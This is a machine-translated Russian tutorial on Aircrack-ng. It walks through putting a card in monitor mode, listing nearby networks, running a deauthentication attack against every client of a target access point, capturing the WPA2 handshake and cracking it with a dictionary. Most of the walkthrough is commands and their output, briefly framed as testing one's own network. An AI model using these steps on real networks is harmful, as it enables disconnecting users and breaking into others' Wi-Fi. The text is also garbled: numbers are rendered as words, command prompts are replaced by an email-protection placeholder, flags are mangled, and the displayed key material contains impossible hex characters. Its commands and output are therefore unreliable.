Как использовать Aircrack-ng

How Use Aircrack Ng



В большинстве случаев люди никогда не думают о сети, к которой они подключены. Они никогда не задумываются, насколько безопасна эта сеть и насколько ежедневно они рискуют своими конфиденциальными данными. Вы можете запускать проверки уязвимостей в своих сетях Wi-Fi с помощью очень мощного инструмента под названием Aircrack-ng и Wireshark. Wireshark используется для мониторинга сетевой активности. Aircrack-ng больше похож на агрессивный инструмент, который позволяет взламывать и предоставлять доступ к беспроводным соединениям. Мыслить как злоумышленник всегда было самым безопасным способом защитить себя от взлома. Возможно, вы сможете понять, какие именно действия предпримет злоумышленник, чтобы получить доступ к вашей системе, узнав об aircrack. Затем вы можете провести проверку соответствия в своей собственной системе, чтобы убедиться, что она небезопасна.

Aircrack-ng представляет собой полный набор программного обеспечения, предназначенного для проверки безопасности сети Wi-Fi. Это не просто инструмент, а набор инструментов, каждый из которых выполняет определенную задачу. Можно работать над различными областями безопасности Wi-Fi, такими как мониторинг точки доступа, тестирование, атака сети, взлом сети Wi-Fi и ее тестирование. Ключевая цель Aircrack - перехватить пакеты и расшифровать хэши для взлома паролей. Он поддерживает почти все новые беспроводные интерфейсы. Aircrack-ng это улучшенная версия устаревшего набора инструментов Aircrack, ng относится к Новое поколение . Некоторые из замечательных инструментов, которые работают вместе для решения более сложной задачи.







Аирмон:

Airmon-ng входит в комплект aircrack-ng, который переводит сетевую карту в режим монитора. Сетевые карты обычно принимают только пакеты, предназначенные для них, как определено MAC-адресом сетевого адаптера, но с airmon-ng все беспроводные пакеты, независимо от того, нацелены они на них или нет, также будут приняты. Вы должны иметь возможность перехватывать эти пакеты без связывания или аутентификации с точкой доступа. Он используется для проверки состояния точки доступа, переводя сетевой интерфейс в режим мониторинга. Во-первых, нужно настроить беспроводные карты для включения режима монитора, а затем убить все фоновые процессы, если вы считаете, что какой-либо процесс ему мешает. После завершения процессов режим монитора можно включить на беспроводном интерфейсе, выполнив следующую команду:



[электронная почта защищена]: ~ $судоairmon-ng start wlan0#

Вы также можете отключить режим монитора, остановив airmon-ng в любое время, используя команду ниже:

[электронная почта защищена]: ~ $судоairmon-ng stop wlan0#

Аэродамп:

Airodump-ng используется для составления списка всех окружающих нас сетей и просмотра ценной информации о них. Основная функция airodump-ng заключается в том, чтобы обнюхивать пакеты, поэтому он, по сути, запрограммирован на захват всех пакетов вокруг нас, будучи переведенным в режим мониторинга. Мы запустим его для всех подключений вокруг нас и соберем такие данные, как количество клиентов, подключенных к сети, их соответствующие MAC-адреса, стиль шифрования и имена каналов, а затем начнем нацеливаться на нашу целевую сеть.

Набрав команду airodump-ng и указав ей имя сетевого интерфейса в качестве параметра, мы можем активировать этот инструмент. В нем будут перечислены все точки доступа, количество пакетов данных, используемые методы шифрования и аутентификации, а также имя сети (ESSID). С точки зрения взлома, MAC-адреса являются наиболее важными полями.

[электронная почта защищена]: ~ $судоairodump-ng wlx0mon

Aircrack:

Aircrack используется для взлома паролей. После захвата всех пакетов с помощью airodump мы можем взломать ключ с помощью aircrack. Эти ключи взламываются двумя методами: PTW и FMS. Подход PTW осуществляется в два этапа. Сначала используются только пакеты ARP, и только затем, если ключ не взломан после поиска, используются все остальные захваченные пакеты. Плюс подхода PTW в том, что не все пакеты используются для взлома. Во втором подходе, то есть FMS, мы используем как статистические модели, так и алгоритмы грубой силы для взлома ключа. Также можно использовать словарный метод.

Aireplay:

Airplay-ng вводит пакеты в беспроводную сеть для создания или ускорения трафика. Пакеты из двух разных источников могут быть захвачены с помощью aireplay-ng. Первая - это живая сеть, а вторая - это пакеты из уже существующего файла pcap. Airplay-ng полезен во время атаки деаутентификации, нацеленной на точку беспроводного доступа и пользователя. Более того, вы можете выполнять некоторые атаки, такие как атака кофе-латте, с помощью airplay-ng, инструмента, который позволяет вам получить ключ от клиентской системы. Вы можете добиться этого, перехватив ARP-пакет, а затем обработав его и отправив обратно в систему. Затем клиент создаст пакет, который может быть захвачен airodump, и aircrack взломает ключ из этого измененного пакета. Некоторые другие варианты атаки airplay-ng включают chopchop, fragment arepreplay и т. Д.

Авиабаза:

Airbase-ng используется для преобразования компьютера злоумышленника в скомпрометированную точку подключения, к которой могут подключиться другие. Используя Airbase-ng, вы можете заявить о себе как о легальной точке доступа и проводить атаки типа «злоумышленник в середине» на компьютеры, подключенные к вашей сети. Эти виды атак называются атаками зла-близнеца. Обычные пользователи не могут отличить легальную точку доступа от поддельной. Таким образом, угроза злого близнеца - одна из самых серьезных угроз беспроводной связи, с которыми мы сталкиваемся сегодня.

Аиролиб-нг:

Airolib ускоряет процесс взлома, сохраняя списки паролей и точки доступа и управляя ими. В этой программе используется система управления базами данных SQLite3, которая в основном доступна на всех платформах. Взлом пароля включает вычисление парного главного ключа, с помощью которого извлекается частный временный ключ (PTK). Используя PTK, вы можете определить идентификационный код сообщения кадра (MIC) для данного пакета и теоретически обнаружить, что MIC похож на пакет, поэтому, если PTK был правильным, PMK также был правильным.

Чтобы просмотреть списки паролей и сети доступа, хранящиеся в базе данных, введите следующую команду:

[электронная почта защищена]: ~ $судоairolib-ng testdatabase –stats

Здесь testdatabase - это база данных, к которой вы хотите получить доступ или создать, а –stats - это операция, которую вы хотите выполнить с ней. Вы можете выполнять несколько операций с полями базы данных, например, назначать максимальный приоритет некоторому SSID или чему-то еще. Чтобы использовать airolib-ng с aircrack-ng, введите следующую команду:

[электронная почта защищена]: ~ $судоAircrack-ngtestdatabase wpa2.eapol.cap

Здесь мы используем уже вычисленные PMK, хранящиеся в тестовая база данных для ускорения процесса взлома паролей.

Взлом WPA / WPA2 с помощью Aircrack-ng:

Давайте посмотрим на небольшой пример того, что может делать aircrack-ng с помощью нескольких из его замечательных инструментов. Мы взломаем общий ключ сети WPA / WPA2, используя метод словаря.

Первое, что нам нужно сделать, это перечислить сетевые интерфейсы, поддерживающие режим монитора. Это можно сделать с помощью следующей команды:

[электронная почта защищена]: ~ $судоAirmon-NG

Набор микросхем драйвера интерфейса PHY

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Мы видим интерфейс; Теперь мы должны перевести найденный сетевой интерфейс (wlx0) в режим монитора, используя следующую команду:

[электронная почта защищена]: ~ $судоairmon-ng start wlx0

Он включил режим монитора на интерфейсе, называемом wlx0mon .

Теперь мы должны начать прослушивание трансляций ближайших маршрутизаторов через наш сетевой интерфейс, который мы перевели в режим мониторинга.

[электронная почта защищена]: ~ $судоairodump-ng wlx0mon

CH5 ][Прошло:30s][ 2020 г.-12-02 00:17



Маячки BSSID PWR# Данные, # / с CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: CE:31 год -Четыре пять 62 27 0 154e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10:БЫТЬ-63 77 0 0 654e. WPA2 CCMP PSK Взломать

C8: 3A:35 год: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74: ДАЕТ:88: FA:38: 02-68 28 год 2 0 одиннадцать54e WPA2 CCMP PSK TP-Link_3802



Датчик потери кадров BSSID STATION PWR Rate Lost Frames Probe



E4: 6F:13: 04: CE:31 год5C: 3A:Четыре пять: D7: EA: 8B -3 0- 1e8 5

E4: 6F:13: 04: CE:31 годC4:67: D3: C2: CD: D7 -331e- 6e0 3

E4: 6F:13: 04: CE:31 год5C: C3: 07:56:61: EF -35 год 0-1 0 6

E4: 6F:13: 04: CE:31 годДО Н.Э:91: B5: F8: 7E: D5 -390e-1 1002 13

Наша целевая сеть Взломать его в данном случае, который в настоящее время работает на канале 1.

Здесь, чтобы взломать пароль целевой сети, нам нужно захватить 4-стороннее рукопожатие, которое происходит, когда устройство пытается подключиться к сети. Мы можем захватить его, используя следующую команду:

[электронная почта защищена]: ~ $судоairodump-ng-c 1--bssid E4: 6F:13: 04: CE:31 год /дом wlx0

-c : Канал

–Bss : Bssid целевой сети

: Имя каталога, в который будет помещен файл pcap.

Теперь нам нужно дождаться подключения устройства к сети, но есть способ лучше зафиксировать рукопожатие. Мы можем деаутентифицировать устройства на AP с помощью атаки деаутентификации, используя следующую команду:

[электронная почта защищена]: ~ $судоAireplay-NG-0 E4: 6F:13: 04: CE:31 год

к : Bssid целевой сети

-0 : атака деаутентификации

Мы отключили все устройства, и теперь нам нужно дождаться подключения устройства к сети.

CH1 ][Прошло:30s][ 2020 г.-12-02 00:02][Рукопожатие WPA: E4: 6F:13: 04: CE:31 год



Маячки BSSID PWR RXQ# Данные, # / с CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: CE:31 год -47 1 228 807 36 154-я WPA2 CCMP PSK P



Датчик потери кадров BSSID STATION PWR Rate Lost Frames Probe



E4: 6F:13: 04: CE:31 годДО Н.Э:91: B5: F8: 7E: D5 -35 год 0-1 0 1

E4: 6F:13: 04: CE:31 год5C: 3A:Четыре пять: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 год 88:28 год: B3:30:27: 7E -31 год0e-1 0 32

E4: 6F:13: 04: CE:31 годC4:67: D3: C2: CD: D7 -35 год0e- 6e263 708Взломать его

E4: 6F:13: 04: CE:31 годD4: 6A: 6A:99: ED: E3 -35 год0e- 0e0 86

E4: 6F:13: 04: CE:31 год5C: C3: 07:56:61: EF -37 0- 1e0 1

Мы получили попадание, и, посмотрев на верхний правый угол рядом с временем, мы можем увидеть, что рукопожатие было зафиксировано. Теперь заглянем в указанную папку ( /дом в нашем случае) для .pcap файл.

Чтобы взломать ключ WPA, мы можем использовать следующую команду:

[электронная почта защищена]: ~ $судоAircrack-ng-a2 rockyou.txt-bE4: 6F:13: 04: CE:31 годhandshake.cap

b: Bssid целевой сети

-a2: режим WPA2

Rockyou.txt: Словарьфайлиспользовал

Handshake.cap: Theфайл которыйсодержит захваченное рукопожатие

Aircrack-ng1.2beta3

[00:01:49] 10566ключи протестированы(1017,96к/s)

КЛЮЧ НАЙДЕН! [ты поймал меня]

Мастер-ключ: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896Б 7Б 6Д

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6FпятьдесятC


Переходный ключ: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6FпятьдесятC025 62E9 5D71

Ключ к нашей целевой сети был успешно взломан.

Заключение:

Беспроводные сети используются везде, от рабочих, использующих смартфоны, до промышленных устройств управления. Согласно исследованиям, в 2021 году почти более 50 процентов интернет-трафика будет проходить через Wi-Fi. Беспроводные сети имеют множество преимуществ, связь за пределами дома, быстрый доступ в Интернет в местах, где почти невозможно прокладывать провода, могут расширять сеть без прокладки кабелей. для любого другого пользователя, и вы можете легко подключить свои мобильные устройства к домашнему офису, пока вас там нет.

Несмотря на эти преимущества, существует большой вопрос о вашей конфиденциальности и безопасности. Как эти сети; в пределах диапазона передачи маршрутизаторы открыты для всех, они могут быть легко атакованы, а ваши данные могут быть легко скомпрометированы. Например, если вы подключены к какому-либо общедоступному Wi-Fi, любой, кто подключен к этой сети, может легко проверить ваш сетевой трафик, используя некоторый интеллект и с помощью доступных потрясающих инструментов, и даже сбросить его.